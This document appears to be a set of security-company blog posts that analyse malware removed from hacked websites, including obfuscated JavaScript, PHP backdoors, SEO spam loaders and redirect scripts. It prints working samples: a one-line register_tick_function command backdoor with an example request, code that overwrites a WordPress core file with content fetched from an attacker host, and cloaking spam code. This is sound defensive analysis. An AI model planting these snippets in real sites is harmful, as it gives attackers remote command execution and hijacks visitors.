Ghost from the Past

Some sites stay infected, or are never properly cleaned, for years. Eventually, they come to us and we clean them. It doesn’t matter whether the malware is old or new, but old malware can tell stories to those who can read it.

For example, this February (2017), we cleaned one site with infected JavaScript files. There was nothing special about it; everything was cleaned automatically. However, our analyst, Moe Obaid, decided to take a look at the removed code:

date=new Date();var ar="pE=C r:]?me;...cw{ 'nBgNA>}h)ly";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f12,0,60,12,24,-33,...skipped...126,-63,69,-72,6,9,54,-105,-21,0,120]".replace(k.substr(0,1),'[');
pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);
e=e();ar2=e(ar2);s="";var pos=0;
for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);e(s);

The obfuscation was quite familiar, but this time my attention was drawn to the following code:

pau="rn ev2010".replace(date.getFullYear()-1,"al");

In order to deobfuscate the code, the result of this expression should be "rn eval" (forming the "return eval" in the next statement). But the replacement only matches when date.getFullYear()-1 equals 2010, which means this could only happen back in 2011! So I had to slightly modify the code to deobfuscate it, which gave me this code for an invisible iframe:

<i f r a m e src='hxxp://g3service[.]ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQQHDQAMAg==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></i f r a m e>

Indeed, this malware was active back in June of 2011 and now the domain is defunct.

This information is enough to tell us that the malware was designed to only work in 2011 (back then hackers liked to use disposable domains for just a few days or even hours) and that the site hasn’t been properly cleaned for more than five years. Since 2012, that defunct malware stayed there like a ghost from the past.

When malware injection goes wrong

Today, while scanning a client’s website, I found a failed attempt by attackers to hide the location of a backdoor. It is very common for us to find backdoor uploaders on websites, as they are one of the principal ways attackers upload malicious content onto compromised sites. However, there was something interesting about this particular case.

Our scanners found a file that triggered the generic signature php.backdoor.uploader_gen.007. Though we see plenty of functions that may be used as backdoors, in this particular case the file name stuck out to me:

./googlec4d267ac9f2bab3e.html

Anyone who uses Google Webmaster Tools will recognize this as a site verification file for the service. The attackers were hiding behind a legitimate-looking filename and path, hoping that nobody would notice!

Accessing the file in my browser confirmed that the code was not being executed. What the attackers didn’t realize is that .html files are usually not interpreted as PHP scripts. I’m sorry, better luck on the next injection.

This is a good example of why it’s important to employ file integrity monitoring and review any modifications to files on your website.

Fun fact: The usual size of a GWT verification file is around 50-55 bytes. If you ever hop onto your server and notice that your GWT file is much larger than that, then this simple trick might have been used against you!
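As a quick illustration of that tip, here is a minimal sketch (not part of the original investigation) that walks a document root and flags Google verification files that look too large to be legitimate; the $docroot path and the 100-byte threshold are assumptions you would adjust for your own environment:

<?php
// Hypothetical check: legitimate Google verification files are ~50-55 bytes,
// so anything substantially larger deserves a closer look.
$docroot   = '/var/www/html'; // assumption: adjust to your document root
$threshold = 100;             // bytes

foreach (glob($docroot . '/google*.html') as $file) {
    $size = filesize($file);
    if ($size > $threshold) {
        echo "Suspicious: $file ($size bytes)\n";
    }
}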

Spam content injection

During a recent incident response investigation, we detected an infected website loading spam content from another location. The malware was responsible for fetching the spam and displaying it on the front page without the client's knowledge or consent.


Let’s break down the infection and work through it step by step.

First, the malware calls ignore_user_abort(true) to ensure that the script keeps running even if the visitor aborts the request, and sets set_time_limit(0) so that execution never times out.

<html><body>Nic No Removed Ver0.5<?php
    ignore_user_abort(true);
    set_time_limit(0);

Then an infinite loop checks and recreates the malicious file over and over again. Inside the loop, the malware checks whether the wp-blog-header.php file is writable. This file was not chosen arbitrarily; wp-blog-header.php is a WordPress core file, which means the malware will be loaded every time the blog is accessed. The loop then replaces the original core file with an infected version fetched from a remote location.

while(1){
    $path = "/var/www/vhosts/site.com/httpdocs/wp-blog-header.php";
    if (is_writable($path) == false) {
        unlink($path);
        echo "del";
        chmod($path,0777);
    }
    file_put_contents($path, file_get_contents("hXXp://ga-google[.]com/Nic/feng/infecteddomain.txt"));

This infecteddomain.txt file contains a copy of the core wp-blog-header.php file injected with typical SEO spam malware. The interesting part is that the attacker kept a separate file for every site infected with this malicious code.
As you can see in the following code snippet, it checks the user agent and, if a search engine is rendering the page, creates links to a pirated Windows download site.

<?php
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
$mysite = "http://victm-site.dom/";
$filename = "";
$fromsite = "hxxp://windowsiso[.]net/windows-7-iso/windows-7-download/professional-iso-7/";
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {
    $ksite = !empty($_GET['p']) ? $_GET['p'] : "";
    $list = array();
    $listname = $filename . "?p=";
    $liststr = "<div style='text-align: center'>";
    foreach ($list as $key => $val) {
        if ($ksite == $key) {
            $fromsite = $val;
        }
        $liststr .= "<a href='" . $mysite . $filename . "?p=" . $key . "'>" . $key . "</a>&nbsp;&nbsp;";
    }
    $liststr .= "</div>";
    $url = empty($_GET['viewid']) ? "" : $_GET['viewid'];
    $content = file_get_contents($fromsite . $url);
    if (!empty($ksite)) {
        $qstr = $filename . "?p=" . $ksite . "&viewid=";
    } else {
        $qstr = $filename . "?viewid=";
    }
    $repstr = $mysite . $qstr;
    $content = str_ireplace('href="', 'href="/', $content);
    $content = str_ireplace('href="//', 'href="/', $content);
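If you want to check whether your own site is serving different content to crawlers, which is exactly what this cloaking relies on, a simple approach is to request a page twice, once with a normal user agent and once with a search engine user agent, and compare the results. The following is a minimal sketch assuming the cURL extension is available; the URL and the Googlebot user-agent string are illustrative:

<?php
// Fetch a page twice: once as a regular browser, once pretending to be Googlebot,
// then compare the responses. Large differences may indicate cloaked spam.
function fetch($url, $userAgent) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$url    = 'http://example.com/'; // assumption: your own site
$asUser = fetch($url, 'Mozilla/5.0');
$asBot  = fetch($url, 'Googlebot/2.1 (+http://www.google.com/bot.html)');

echo ($asUser === $asBot)
    ? "Responses match.\n"
    : "Responses differ; review the bot version for injected spam links.\n";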

This type of malware is very common and can be used to inject many types of spam content into your website, impacting your site’s SERPs (Search Engine Result Pages). If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

.user.ini SPAM SEO Redirect

Since PHP 5.3.0, PHP has supported per-directory configuration INI files, which (depending on the case) have much the same effect that .htaccess files have on Apache. With that in mind, attackers are exploiting this feature to manipulate search engine results in favor of malicious websites and to redirect users to arbitrary spam content.


The payload is based on specific directives injected into ".user.ini"; hence it's executed before the site is rendered. In Spam SEO redirects that use only ".htaccess" rules, the payload result is visible in the browser but the malicious code itself is not. In this particular case, however, we were able to detect the malicious code directly.

Following are the directives injected into “.user.ini”:

; Directive 1
auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'
; END Directive 1

This type of .ini file doesn’t override all php.ini settings; however, it allows attackers to use the auto_prepend_file directive, which loads a file that is parsed before the main PHP file (it is included as if by the require function). In this case, auto_prepend_file was loading "/tmp/.tmp/wrtZaCDz2", which contained the following code:

<?php
$mysqli_class = '/tmp/.tmp/wrtLaCDz7';
$mysqli_init = file_get_contents($mysqli_class);
$streams_cache = tmpfile();
fwrite($streams_cache, gzuncompress($mysqli_init));
$stream_id = stream_get_meta_data($streams_cache);
include $stream_id['uri'];

After gzuncompress()’ing the content of the file "/tmp/.tmp/wrtLaCDz7", we get malware that implements evasive techniques against different search engines and assembles redirect links to the malicious website (hxxp://search-tracker[dot]com/in.cgi?7&parameter=$keyword&se=$se&ur=1).

This infection was found on servers running nginx, but as long as the ability to use .user.ini files is enabled, there’s a chance attackers may use it to take advantage of your resources. If you are not using the feature, we highly recommend disabling it to prevent any issues.
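If you do not rely on per-directory INI files at all, the feature can be switched off globally. As a minimal sketch (this is a system-wide php.ini change, not something that can be set from .user.ini itself), clearing the user_ini.filename directive stops PHP from scanning directories for these files:

; php.ini - disable per-directory INI files if you don't use them
user_ini.filename =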

Backdooring sites using exotic PHP functions

Throughout the last few months, we have published multiple articles about simple but powerful backdoors and how attackers get creative. In virtually all cases, the code is designed to avoid detection, and it’s not always heavily encoded. In fact, we are seeing that most attackers follow the KISS principle (“keep it simple, stupid”, or “keep it short and simple”), and PHP is a vast language that offers plenty of ways to implement malicious code in that spirit.


During an investigation, we found a small piece of code making use of the PHP function register_tick_function(). A “tick” in PHP is an event that fires for every N low-level statements executed inside a declare(ticks=N) block, and register_tick_function() registers a callback to be run on each tick. The mechanism is usually used for testing purposes (monitoring, profiling, etc.), but as you might expect, it can also be used by attackers to mask their code and maintain access for as long as possible.
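To make the mechanism concrete, here is a minimal benign sketch (not taken from the infected site) showing a tick handler being invoked as ordinary statements execute:

<?php
declare(ticks=1); // fire a tick after (roughly) every statement

$count = 0;
function tick_handler() {
    global $count;
    $count++;
}
register_tick_function('tick_handler');

$a = 1; // each of these statements generates a tick,
$b = 2; // silently invoking tick_handler() behind the scenes
echo "tick handler ran $count times\n";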

Here is the malicious snippet:

 declare(ticks=1)/*h85j7*/; @register_tick_function(${"_POST"}{'CEC'},@${"_POST"}{'Q36'} ); 

This piece of malware could be injected into virtually any PHP file on your server, either standalone or alongside legitimate code, and it executes whatever command you pass as an argument through the 'CEC' and 'Q36' parameters, in a request like the following:

CEC=passthru&Q36=whoami
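Substituting those values into the injected line, the backdoor is roughly equivalent to the following sketch (a hypothetical reconstruction for clarity, not the attacker’s literal code):

<?php
// Rough equivalent once CEC=passthru and Q36=whoami are supplied via POST:
declare(ticks=1);
@register_tick_function('passthru', 'whoami');

// From here on, every tickable statement triggers passthru('whoami'),
// so the command output ends up in the HTTP response to the attacker.
$noop = 1;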

As you may have noticed, the malware acts like a regular backdoor, allowing arbitrary command execution on affected websites, while relying on a little-known PHP function rather than noisy obfuscation methods that could draw attention to the code.

If your website has been infected and you need some help cleaning it up, please let us know.

Hiding malicious code from the user using whitespaces

Over the years, attackers have used different techniques for hiding malicious files on websites. They have obfuscated code, modified legitimate functions to execute malware, replaced whole core files to carry out their malicious activity, and much more.


In this article, we’ll describe a simple way of hiding malware from inexperienced webmasters who use text editors that do not wrap long lines of code. Instead of injecting complex and obfuscated code, the attackers simply added whitespace at the beginning of the file. The snippet in question follows:

At first glance, the file looked pretty normal. Upon further inspection, we noticed that code had been pushed out of view by 598 whitespace characters at the beginning of the first line. Scrolling to the right revealed the following content:

<?php $x8 = "\x63\x68\x72"; $E7 = "\x69\x6e\x74\x76\x61\x6c"; $Qb = $x8($E7("\x31\x30\x31")).$x8($E7($x8($E7("\x3….
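To see how this encoding resolves, here is a quick sketch that decodes only the fragment visible above (the full payload is not reproduced here); the hex escapes spell out ordinary PHP function names, which are then used to rebuild the rest of the code character by character:

<?php
$x8 = "\x63\x68\x72";             // "chr"
$E7 = "\x69\x6e\x74\x76\x61\x6c"; // "intval"

// chr(intval("101")) => chr(101) => "e"
echo $x8($E7("\x31\x30\x31"));    // prints "e", the first character being assembled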

In this particular case, the attacker hid a heavily encoded PHP backdoor in the file. Different attacks use this very same technique, such as SEO spam injections, credential and credit card stealers, and others.

If you suspect any malware activity on your website and at first glance cannot find anything suspicious, we recommend checking for recently modified files. If you are not comfortable modifying files and the database yourself, you can rely on the Security Engineers at https://sucuri.net to clean and protect your website.

Checking blacklisted domains or IPs for spamming

Oftentimes we encounter websites that have been injected with a redirect. These can vary from blackhat SEO tactics for boosting domain rankings all the way to phishing pages trying to steal login credentials. In this case, the redirect was contained within randomly named alphanumeric PHP files, and it sent visitors first to those files and then on to a pharmacy spam website full of the drug names you commonly see in the emails sitting in your spam folder. This indicates that the attacker was spamming from other third-party servers and, within the pharmacy spam emails, including URLs pointing to the malicious file on our client’s web server. Let us analyze parts of this malicious file:


if($_GET['mod']){
    if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
        $g_sch = file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
        $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
        if($g_out){
            header('HTTP/1.1 202');
            exit;
        }
    }
}
header('Location: http://[malicious domain]/');

The payload delivered to an unsuspecting visitor is a browser redirect, performed with PHP’s header() function, to a malicious domain. The same malicious file with the redirect is placed on multiple websites that have already been compromised; the attacker then directs traffic via hyperlinks in the outgoing spam emails to the compromised websites hosting the redirect. The goal is to trick spam filters by using legitimate, compromised websites containing the malicious redirect instead of linking directly to the pharmacy spam website in the spam emails. If the pharmacy spam URL were included directly in the outgoing emails, it would not be long until spam filters (e.g., Spamhaus) blacklisted the pharmacy spam website’s entire domain name.

Another problem for the attacker is that if the compromised websites, or their hosting IPs, become blacklisted, spam filters will detect the links and block delivery of the spam emails for containing blacklisted content.

This means the hacker wants to be able to regularly check the referring websites that contain the malicious redirect file and determine whether they have been blacklisted. In this specific malicious file, the blacklist check is triggered through a $_GET request to the file with a specific URL parameter. When such a request is received, the PHP file uses the file_get_contents function to fetch the output of the Google Safe Browsing diagnostic page for the current host:

if($_GET['mod']){
    if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
        $g_sch = file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
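The decision of whether the host is blacklisted then hinges on the fourth parameter of str_replace(), which is filled with the number of replacements performed; if the string "listed" appears anywhere in the Safe Browsing response, that counter is non-zero. Here is a minimal sketch of that logic, using a made-up response string:

<?php
// Hypothetical Safe Browsing-style response, for illustration only.
$g_sch = 'This site is currently listed as suspicious...';

// str_replace()'s fourth argument receives the number of replacements made,
// so it doubles as a "was the word present?" counter.
$g_sch = str_replace('listed', '', $g_sch, $g_out);

if ($g_out) {
    echo "Host appears to be blacklisted ($g_out match found).\n";
} else {
    echo "Host looks clean.\n";
}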

Once a compromised referring website, or its hosting IP, shows as blacklisted, the hacker can stop sending traffic through that domain or IP to prevent any negative impact on their targeted domain.

As mentioned earlier, there are usually many compromised websites referring/redirecting to the targeted domain. To be efficient and automate the task, the attacker creates a cron job or other scheduled task that sends the $_GET request to the malicious file; based on the returned HTTP code, they can determine whether the website or hosting IP address has been blacklisted. If the request with the necessary URL parameter returns a 202 HTTP code, it means the host is blacklisted by Google. Oftentimes these cron jobs output the result of the $_GET request to a file so it can be monitored over time, although by default cron will email the output to the configured address each time the job runs. Below is an example of such a cron job that runs every minute and stores the numeric HTTP code returned by the malicious redirect file on the compromised website:

# crontab -l
* * * * * curl -sD - "http://localhost/malware.php?mod=00X" | grep HTTP | awk '{print $2}' > /tmp/http.txt

In this example, curl -sD - dumps the response headers, grep isolates the status line, and awk prints the numeric status code, which is written to /tmp/http.txt. The following code excerpt from the malicious redirect file shows how the script immediately exits after answering with HTTP code 202 whenever the host appears as "listed", i.e., whenever a blacklisting is active:

$g_sch = str_replace('"listed"', '', $g_sch, $g_out);
if($g_out){
    header('HTTP/1.1 202');
    exit;
}

The automated blacklist checking helps the attackers by letting them avoid sending spam emails containing blacklisted domains or IP addresses, as they are well aware that doing so would hurt their redirect success rate.